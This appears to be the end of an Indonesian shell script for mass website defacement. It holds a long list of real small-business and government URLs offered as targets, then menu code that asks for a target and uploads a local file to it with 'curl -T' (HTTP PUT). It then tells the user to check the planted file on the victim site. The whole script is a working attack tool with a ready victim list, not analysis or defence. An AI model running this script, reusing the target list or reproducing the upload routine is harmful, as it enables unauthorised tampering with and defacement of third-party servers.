http://tieronecapital.co.za
http://thepremiummakers.com
http://thembelahome.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://liessor.co.za
http://ziady.com
http://paradiseyouthclub.com
http://kabby.tk
http://dryfaden.com
http://beydagida.com
http://ariquemesagencia.com.br
http://quintessential-tours.com
http://prorepafrica.com
http://rollaslat.com
http://orbfusion.com
http://jormid.net
http://savanacloud.com
http://opiniong.com
http://orbfusion.com
http://studentsonline.co.za
http://safemode.co.za
http://cederberghouse.co.za
http://rollaslat.com
http://roofliuss.co.za
http://savanacloud.com
http://southernafricablog.com
http://stand66.com
http://tapifare.com
http://techdirect.co.za
http://thepremiummakers.com
http://thepremiummakers.com
http://liafficam.co.za
http://whadiz.com
http://whosting.co.za
http://whosting.co.za
http://savanacloud.com
http://opiniong.com
http://thepremiummakers.com
http://quintessential-tours.com
http://prorepafrica.com
http://rollaslat.com
http://orbfusion.com
http://jormid.net
http://savanacloud.com
http://orbfusion.com
http://studentsonline.co.za
http://safemode.co.za
http://cederberghouse.co.za
http://rollaslat.com
http://roofliuss.co.za
http://savanacloud.com
http://southernafricablog.com
http://stand66.com
http://bee-it.co.za
http://butterflowers.co.za
http://bananabox.co.za
http://ayk.co.za
http://ads247.co.za
http://allpaint.co.za
http://atlanticphysio.co.za
http://valdicare.co.za
http://vmicl.co.za
http://lioon.co.za
http://nyarhi.co.za
http://niliobikes.co.za
http://nhisa.co.za
http://netcallcollect.co.za
http://naturaleyeimages.com
http://mpark.co.za
http://contsol.co.za
http://colourfactory.co.za
http://chillibitez.co.za
http://chasingfantasia.com
http://cenlialtech.co.za
http://moneyin1week.co.za
http://mix007.co.za
http://mediacube.co.za
http://megro.co.za
http://menogold.co.za
http://mestern.co.za
http://tcmgroup.co.za
http://sublimeconfectionery.co.za
http://tieronecapital.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://liessor.co.za
http://www.ajaxfilebrowser.co 
http://bitsandpieces.co.za 
http://windmillsandporcupines.co.za 
http://scnc.co.za 
http://contsol.co.za
 http://colourfactory.co.za 
http://ayk.co.za
 http://daretogowildafrica.co.za 
http://floralandfresh.co.za 
http://foodconsult.co.za 
http://itsengineering.co.za 
http://holotropicbreathwork.co.za 
http://handj.co.za 
http://lpenterprises.co.za 
http://kwalitycommodities.co.za 
http://mestern.co.za 
http://mc3qs.com 
http://naturaleyeimages.com 
http://my-resume.biz 
http://mpark.co.za 
http://montdestin.com 
http://africa-one.co.za 
http://8x8.co.za 
http://allpaint.co.za 
http://applebyguesthouse.com 
http://atlanticphysio.co.za 
http://systemshouse.co.za 
http://www.studentsonline.co.za 
http://lucaniphysio.co.za 
http://www.pipelinetape.co.za 
http://www.drcrsaexpress.co.za 
http://mix007.co.za/
http://stand66.com 
http://tapifare.com 
http://tcmgroup.co.za 
http://tressor.co.za 
http://trafficam.co.za 
http://nyarhi.co.za 
http://inlislitev3.perpusnas.go.id 
http://clcooling.co.za 
http://sublimeconfectionery.co.za 
http://gogreenplumbing.co.za 
http://golfbuzz.co.za 
http://grupo-cma.com 
http://kgarebana.co.za 
http://ittrader.co.za 
http://hellomobile.mobi 
http://gordonhoward.co.za 
http://chillibitez.co.za 
http://cmweb.co.za 
http://essentialtours.com 
http://entitledvip.com 
http://forget-me-not.co.za 
http://everythingdating.co.za
http://adr.soluzionimediacom.com/
http://asianapoli.soluzionimediacom.com/
http://call-center.gruppomediacom.it/
http://callcenter.gruppomediacom.it/
http://gancia.soluzionimediacom.com/
http://gruppomediacom.com/
http://gruppomediacom.it/
http://hr.soluzionimediacom.com/
http://job.gruppomediacom.it/
http://www.correiodoc.correiodecarajas.com.br/
http://www.correiodecarajas.com.br/
http://www.enoticialagodetucurui.com/
http://hauntedreview.com/
http://gruppomediacom.com/
http://www.ingacarrasco.com.ar/
http://­api-couplings.co.za/
http://atctaekwondo.co.za/
http://doacoes.fussesp.sp.gov.br/
http://www.6y555.com/
http://www.nuclear-experts.net/
http://www.anecra.pt/
http://209.60.104.53/
http://baza.ds.org.rs/
http://oulitnet.co.za/
http://liteoptec.co.za/
http://0739.gwytk.com/
http://hr.systematixshares.com/
http://leader.gwytk.com/
http://www.rabachino.com/
http://b2b.modelberg.it/
http://hengyue-media.com/
http://webphone.zayhi.com/
http://koiis.co.kr/
http://223.255.137.119/
http://sys.betafac.com/
http://gateway.net.co/
http://hq.prospec.co.th/
http://branch.prospec.co.th/
http://rso.gie-vso.fr/
http://112acil.com/
http://magazam.net/
http://happy.mikikk.co.jp/
http://ns1.112acil.com/
http://shop.magazam.net/
http://www.atakan.com.tr/
http://www.magazam.net/
http://ns1.atakan.com.tr/
http://ns1.magazam.net/
http://ns1.vfbayi.com/
http://ns1.evdeiste.com/
http://ptdel.com/
http://majmudars.com/
http://fmetiquetas.com/
http://lacre.pt/
http://www.anecra.pt/
http://saharamutual.com/
http://myownemailer.com/
http://sphinxillustrations.com/
http://www.sphinxanimations.com/
http://vzcx.idasoft.es/
http://213.96.91.26/
http://adr.soluzionimediacom.com/
http://asianapoli.soluzionimediacom.com/
http://call-center.gruppomediacom.it/
-http://callcenter.gruppomediacom.it/
http://gancia.soluzionimediacom.com/
http://gruppomediacom.com/
http://gruppomediacom.it/
http://hr.soluzionimediacom.com/
http://job.gruppomediacom.it/
http://bmis.co.za/
http://capewinedirect.co.za/
http://consciouscapital.co.za/
http://­dry-break.co.za
http://elt.co.za
http://expressiv.co.za
http://­fabiandemo.co.za
http://­fall-arrest.co.za/
http://­fall-protection.co.za­/
http://­flip-flap.co.za/
http://­folding-stairs.co.za/
http://­gangways.co.za/
http://­girlsworld.co.za/
http://­go-mail.co.za/
http://­ibp-jhb.co.za/
http://morling.co.za/
http://mypersonaltrainer.co.­za/
http://fosoft.cn
http://www.lyvtc.cn
http://www.ybklzx.com
http://www.czsdw.com
http://www.kobacn.com
http://www.sxnm.net
http://www.letsch.com
http://d-searcher.com
http://forums.adcom-add.vn
http://www.zx9903.com
http://www.leisuretour.cn
http://www.johsun.com.cn
http://www.xm-cs.com
http://www.sztaichen.com
http://www.lmsqjy.net
http://www.u2u3.cn
http://www.crystalsoftwaregroup.com
http://mail.minge.gov.cn
http://xhgmwsbwg.minge.gov.cn
http://www.xcjjzd.gov.cn
http://www.syjingshenbing.net
http://www.smzmb.net
http://www.qpzyy.com
http://www.szwztc.com
http://www.huanxiuresort.com
http://www.syhxk.com
http://www.panyan8.com
http://www.syjsbyy.net
http://www.syjsk.net
http://www.syyyzyy.net
http://www.syshimian.net
http://www.syshimian.com
http://www.syyyzyy.com
http://www.syzhiliao.net
http://www.syjingshenbing.com
http://www.syqpz.com
http://www.syzhiliao.com
http://www.syyiyuzheng.com
http://www.syqpz.net
http://www.syyyz.net
http://www.syyiyuzheng.net
http://www.syjsb.net
http://pubworksbmsi.com
http://aworkorder.com
http://permitsoftware.com
http://www.higoodhotels.com
http://www.fdlighting.com
http://www.jngzx.com.cn
http://www.zmzmp.com
http://www.sunjex.com
http://www.publicworksbmsi.com
http://www.boxincapital.com
http://yfplac.com/sukijan.htm
http://3g.yfplac.com/sukijan.htm
http://lmhxd.com/sukijan.htm
http://mychuanmei.com/sukijan.htm
http://www.xccylt.com/sukijan.htm
http://xnrsoft.com/sukijan.htm
http://www.petrelocation.com.my/sukijan.htm
http://paslanmazbayrakdiregi.com/sumijan.htm
http://afgbilgisayar.com/sumijan.htm
http://asnurotomotiv.com
http://atikplastik.com
http://besirozer.com
http://burkim.com.tr
http://dakkik.com
http://ferma-tr.com
http://galeriapollo.com
http://grmimpex.com
http://maliyorum.org
http://merdiven.com
http://merdivenhalisi.com
http://nevzatsoydan.com
http://ozerstair.com
http://ozerstairs.com
http://savocats.com
http://solutionsegitim.com
http://teraelektronik.com
http://www.afgbilgisayar.com
http://www.artem.com.tr
http://www.asnurotomotiv.com
http://www.besirozer.com
http://www.bms-co.com.tr
http://www.dakkik.com
http://www.fulyagm.com
http://www.galeriapollo.com
http://www.kusadasirealestate.com
http://www.malianaliz.net
http://www.malianaliz.org
http://www.maliyorum.com
http://www.merdiven.com
http://www.merdivenhalisi.com
http://www.nennycollection.com
http://www.ozerahsap.com
http://www.ozermerdivenmarket.com
http://www.ozerstair.com
http://www.ozerstairs.com
http://www.portatifmerdiven.com
http://www.savocats.com
http://www.sinor.com.tr
http://www.teraelektronik.com
http://duschk.icc.sa
http://e-ctasia.com
http://news.e-ctasia.com
http://shop.e-ctasia.com
http://blog.e-ctasia.com
http://info.e-ctasia.com
http://admin.e-ctasia.com
http://contact.e-ctasia.com
http://mail.e-ctasia.com
http://forum.e-ctasia.com
http://product.e-ctasia.com
http://236.co.kr
http://admin.236.co.kr
http://login.236.co.kr
http://blog.236.co.kr i
http://news.236.co.kr
http://mail.236.co.kr
http://iblec.com.sa
http://ote-sa.com
http://saudigulf.com
http://­online-training.co.za­/
http://­plandesign.co.za/
http://­precisionplastics.co.­za/
http://­printco.co.za/
http://silveroakgroup.co.za/
http://­southafrica-direct.co­m/
http://­swivel-joints.co.za/
http://­wmmacorp.co.za/
http://hq.prospec.co.th/
http://branch.prospec.co.th/
http://tj.allbest.org/
http://www.rabachino.com/
http://www.bbba-grh.com/
http://gruppomediacom.com/
http://www.ratiss.org/
http://www.560560.ru/
http://www.50-50-50.ru/
http://office.ratiss.org/
http://560560.ru/
http://50-50-50.ru/
http://itsallgoodforyou.com/
http://tirupurjobs.net/
http://apparelworld.org/
http://cht.e-bestis.com.tw/
http://apbw.e-bestis.com.tw/
http://doacoes.fussesp.sp.gov.br/
http://www.6y555.com/
http://www.nuclear-experts.net/
http://www.anecra.pt/
http://209.60.104.53/
http://baza.ds.org.rs/
http://oulitnet.co.za/
http://liteoptec.co.za/
http://0739.gwytk.com/
http://hr.systematixshares.com/
http://leader.gwytk.com/
http://www.rabachino.com/
http://b2b.modelberg.it/
http://hengyue-media.com/
http://webphone.zayhi.com/
http://koiis.co.kr/
http://223.255.137.119/
http://sys.betafac.com/
http://gateway.net.co/
http://hq.prospec.co.th/
http://branch.prospec.co.th/
http://rso.gie-vso.fr/
http://112acil.com/
http://magazam.net/
http://happy.mikikk.co.jp/
http://ns1.112acil.com/
http://shop.magazam.net/
http://www.atakan.com.tr/
http://www.magazam.net/
http://ns1.atakan.com.tr/
http://ns1.magazam.net/
http://ns1.vfbayi.com/
http://ns1.evdeiste.com/
http://ptdel.com/
http://majmudars.com/
http://fmetiquetas.com/
http://lacre.pt/
http://www.anecra.pt/
http://saharamutual.com/
http://myownemailer.com/
http://sphinxillustrations.com/
http://www.sphinxanimations.com/
http://vzcx.idasoft.es/
http://213.96.91.26/
http://adr.soluzionimediacom.com/
http://asianapoli.soluzionimediacom.com/
http://call-center.gruppomediacom.it/
-http://callcenter.gruppomediacom.it/
http://gancia.soluzionimediacom.com/
http://gruppomediacom.com/
http://gruppomediacom.it/
http://hr.soluzionimediacom.com/
http://job.gruppomediacom.it/
http://www.correiodoc.correiodecarajas.com.br/
http://www.correiodecarajas.com.br/
http://www.enoticialagodetucurui.com/
http://hauntedreview.com/
http://branch.prospec.co.th/
http://gx.xiongsu.cn/
http://hq.prospec.co.th/
http://wop.zayhi.com/
http://www.tciil.co.in/
http://www.ldgb.net/
http://standards.co.kr/
http://koiis.co.kr/
http://xdoors.astor.it/
http://troop-1539.org/
http://familien-poulsen.dk/
http://orders.southeasternfood.com/
http://leader.gwytk.com/
http://0739.gwytk.com/
http://fmetiquetas.com/
http://oulitnet.co.za/
http://epssa.co.za/
http://loushifashion.com/
http://powerm.cn/
http://60.18.129.36/
http://cszhitu.com/
http://fxlnhly.com/
http://info.yeyadu.cn/
http://electronicculture.ru/
http://lnhuaxun.com/
http://web.yeyadu.cn/
http://www.yeyadu.cn/
http://westmillusa.com/
http://adtime.eugenio.com.br/
http://adtrafficweb.eugenio.com.br/
http://adtrafficweb.grupoeugenio.com.br/
http://offertelavoro.gruppomediacom.it/
http://recupero-crediti.gruppomediacom.it/
http://recuperocrediti.gruppomediacom.it/
http://ricerchedimercato.gruppomediacom.it/
http://www.calciomercatonapoli.info/
http://www.gruppomediacom.com/
http://www.maestrodascia.eu/
http://www.mediacom.biz/
http://maestrodascia.eu/
http://mediacom.biz/
http://tciglobal.com/
http://0731.zgxxk.net/
http://0745.gwytk.com/
http://bestilling.utdanningsdirektoratet.no/
http://www.ldgb.net/
http://www.zgxxk.net/
http://www.567888.pw/
http://www.danahias.at/
http://www.wsdscu.org/
http://bestilling.udir.no/
http://scm.icams.co.kr/
http://158.36.153.158/
http://tirupurjobs.net/
http://www.apparelworld.org/
http://www.tirupurjobs.net/
http://apparelworld.org/
http://gma2t.wlannet.net/
http://praso.wlannet.net/
http://smsget.zayhi.com/
http://tctnh.wlannet.net/
http://webphone.zayhi.com/
http://wop.zayhi.com/
http://isu.allbest.org/
http://iept.allbest.org/
http://cucbridals.com/
http://miracletouch.com.tw/
http://myteam4u.com/
http://imode.e-bestis.com.tw/
http://test.allbest.org/
http://211.23.248.40/
http://gx.xiongsu.cn/
http://cheeshin.com.tw/
http://admats.concerts.com/
http://my.smser.eu/
http://www.lawrenceting.com/
http://dike.dpt.go.th/
http://www.elcsfj.gov.cn/
http://documents.co.st-lucie.fl.us/
http://www.ybsds.gov.cn/
http://rsj.xxz.gov.cn/
http://www.xzll.gov.cn/
http://www.xmfg.gov.cn/
http://zzx.wlcbsgs.gov.cn/
http://www.librogondwana.com.ar/
http://www.ingacarrasco.com.ar/
http://www.salsadella.com.ar/
http://www.bgmgroup.cn/
http://ssc.rrp.kr/

"

echo ""
echo $pu"==========================="
echo -n $i"Masukan Salah Satu Target:" 
read tg
echo ""
echo -n $i"Target $tg !" $cy"Tekan Enter Untuk Tusbol.."
read trgt
curl -T /sdcard/$sc $tg
echo ""
echo ""
echo $me"========================================"
echo $ku"Silakan Di Cek di $cy $tg/$sc" 
echo $me"========================================"

exit

;;


2)echo -n $i"Masukan Target:" 
read tg
echo ""
echo -n $i"Target $tg !" $cy"Tekan Enter Untuk Tusbol.."
read trgt
curl -T /sdcard/$sc $tg
echo ""
echo ""
echo $me"========================================"
echo $ku"Silakan Di Cek di $cy $tg/$sc" 
echo $me"========================================"

exit

;;


*) echo " CARI YANG ADA AJA TOD " | lolcat
esac
done
done
